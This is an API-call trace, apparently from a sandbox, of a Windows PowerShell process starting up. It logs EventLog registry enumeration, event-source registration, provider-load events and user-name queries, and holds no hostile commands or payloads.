	[0559.054] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.055] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.055] CoTaskMemFree (pv=0x0) 
	[0559.055] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x310) returned 0x0
	[0559.055] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.055] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x344) returned 0x0
	[0559.055] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.055] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x348) returned 0x0
	[0559.055] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.055] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x34c) returned 0x0
	[0559.055] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.055] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x350) returned 0x0
	[0559.055] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.056] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x354) returned 0x0
	[0559.056] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.056] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x358) returned 0x0
	[0559.056] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.056] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x35c) returned 0x0
	[0559.056] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.056] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x360) returned 0x0
	[0559.056] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x364) returned 0x0
	[0559.056] RegCloseKey (hKey=0x364) returned 0x0
	[0559.057] RegCloseKey (hKey=0x30c) returned 0x0
	[0559.057] RegCloseKey (hKey=0x360) returned 0x0
	[0559.058] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd388 | out: phkResult=0x1cd388*=0x360) returned 0x0
	[0559.058] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd2fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd2f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd2fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd2f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.058] CoTaskMemFree (pv=0x0) 
	[0559.058] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.058] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.058] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.058] CoTaskMemFree (pv=0x0) 
	[0559.058] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.058] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.058] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.058] CoTaskMemFree (pv=0x0) 
	[0559.058] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.058] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.058] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.058] CoTaskMemFree (pv=0x0) 
	[0559.058] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.058] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.058] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.058] CoTaskMemFree (pv=0x0) 
	[0559.058] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.058] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.059] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.059] CoTaskMemFree (pv=0x0) 
	[0559.059] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.059] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.059] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.059] CoTaskMemFree (pv=0x0) 
	[0559.059] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.059] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.059] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.059] CoTaskMemFree (pv=0x0) 
	[0559.059] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.059] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.059] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.059] CoTaskMemFree (pv=0x0) 
	[0559.059] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.059] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x3a4cf0, lpcchName=0x1cd388, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd388, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.059] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.059] CoTaskMemFree (pv=0x0) 
	[0559.059] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x30c) returned 0x0
	[0559.059] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.059] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x364) returned 0x0
	[0559.059] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.060] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x368) returned 0x0
	[0559.060] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.060] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x36c) returned 0x0
	[0559.060] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.060] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x370) returned 0x0
	[0559.060] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.060] RegOpenKeyExW (in: hKey=0x360, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x374) returned 0x0
	[0559.060] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.060] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x378) returned 0x0
	[0559.060] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.061] RegOpenKeyExW (in: hKey=0x360, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x37c) returned 0x0
	[0559.061] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x0) returned 0x2
	[0559.061] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x380) returned 0x0
	[0559.061] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x384) returned 0x0
	[0559.061] RegCloseKey (hKey=0x384) returned 0x0
	[0559.061] RegCloseKey (hKey=0x360) returned 0x0
	[0559.064] RegCloseKey (hKey=0x380) returned 0x0
	[0559.066] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd358 | out: phkResult=0x1cd358*=0x380) returned 0x0
	[0559.066] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd2cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd2c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd2cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd2c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.066] CoTaskMemFree (pv=0x0) 
	[0559.066] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.066] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x3a4cf0, lpcchName=0x1cd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.066] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.066] CoTaskMemFree (pv=0x0) 
	[0559.066] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.066] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x3a4cf0, lpcchName=0x1cd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.066] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.066] CoTaskMemFree (pv=0x0) 
	[0559.066] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.066] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x3a4cf0, lpcchName=0x1cd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.066] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.066] CoTaskMemFree (pv=0x0) 
	[0559.066] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.066] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x3, lpName=0x3a4cf0, lpcchName=0x1cd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.066] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.066] CoTaskMemFree (pv=0x0) 
	[0559.066] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.066] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x4, lpName=0x3a4cf0, lpcchName=0x1cd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.067] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.067] CoTaskMemFree (pv=0x0) 
	[0559.067] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.067] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x5, lpName=0x3a4cf0, lpcchName=0x1cd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.067] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.067] CoTaskMemFree (pv=0x0) 
	[0559.067] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.067] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x6, lpName=0x3a4cf0, lpcchName=0x1cd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.067] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.067] CoTaskMemFree (pv=0x0) 
	[0559.067] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.067] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x7, lpName=0x3a4cf0, lpcchName=0x1cd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.067] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.067] CoTaskMemFree (pv=0x0) 
	[0559.067] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0559.067] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x8, lpName=0x3a4cf0, lpcchName=0x1cd358, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd358, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0559.067] CoTaskMemFree (pv=0x3a4cf0) 
	[0559.067] CoTaskMemFree (pv=0x0) 
	[0559.067] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x360) returned 0x0
	[0559.067] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x0) returned 0x2
	[0559.067] RegOpenKeyExW (in: hKey=0x380, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x384) returned 0x0
	[0559.068] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x0) returned 0x2
	[0559.068] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x388) returned 0x0
	[0559.068] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x0) returned 0x2
	[0559.068] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x38c) returned 0x0
	[0559.068] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x0) returned 0x2
	[0559.068] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x390) returned 0x0
	[0559.068] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x0) returned 0x2
	[0559.068] RegOpenKeyExW (in: hKey=0x380, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x394) returned 0x0
	[0559.068] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x0) returned 0x2
	[0559.068] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x398) returned 0x0
	[0559.068] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x0) returned 0x2
	[0559.069] RegOpenKeyExW (in: hKey=0x380, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x39c) returned 0x0
	[0559.069] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x0) returned 0x2
	[0559.069] RegOpenKeyExW (in: hKey=0x380, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x3a0) returned 0x0
	[0559.069] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3b8 | out: phkResult=0x1cd3b8*=0x3a4) returned 0x0
	[0559.069] RegCloseKey (hKey=0x3a4) returned 0x0
	[0559.069] RegCloseKey (hKey=0x380) returned 0x0
	[0559.070] RegCloseKey (hKey=0x3a0) returned 0x0
	[0559.075] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b9e0008
	[0560.623] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d9dc40*="WSMan", lpRawData=0x2d9d9b0) returned 1
	[0560.627] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0560.627] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.627] CoTaskMemFree (pv=0x3e2be0) 
	[0560.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.629] CoTaskMemAlloc (cb=0x804) returned 0x1b7ba900
	[0560.629] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7ba900, nSize=0x1cd648 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd648) returned 0x1
	[0560.630] CoTaskMemFree (pv=0x1b7ba900) 
	[0560.630] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0560.630] GetUserNameW (in: lpBuffer=0x3a4cf0, pcbBuffer=0x1cd688 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd688) returned 1
	[0560.630] CoTaskMemFree (pv=0x3a4cf0) 
	[0560.631] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da3178*="Alias", lpRawData=0x2da2f08) returned 1
	[0560.637] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0560.637] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.637] CoTaskMemFree (pv=0x3e2be0) 
	[0560.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0560.639] CoTaskMemAlloc (cb=0x804) returned 0x1b7ba900
	[0560.639] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7ba900, nSize=0x1cd648 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd648) returned 0x1
	[0560.640] CoTaskMemFree (pv=0x1b7ba900) 
	[0560.640] CoTaskMemAlloc (cb=0x204) returned 0x3a4cf0
	[0560.640] GetUserNameW (in: lpBuffer=0x3a4cf0, pcbBuffer=0x1cd688 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd688) returned 1
	[0560.640] CoTaskMemFree (pv=0x3a4cf0) 
	[0560.640] ReportEventW (hEventLog=0x1b9e0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2da8770*="Environment", lpRawData=0x2da8500) returned 1
	[0560.646] CoTaskMemAlloc (cb=0x104) returned 0x3e2be0
	[0560.646] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2be0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0560.646] CoTaskMemFree (pv=0x3e2be0) 
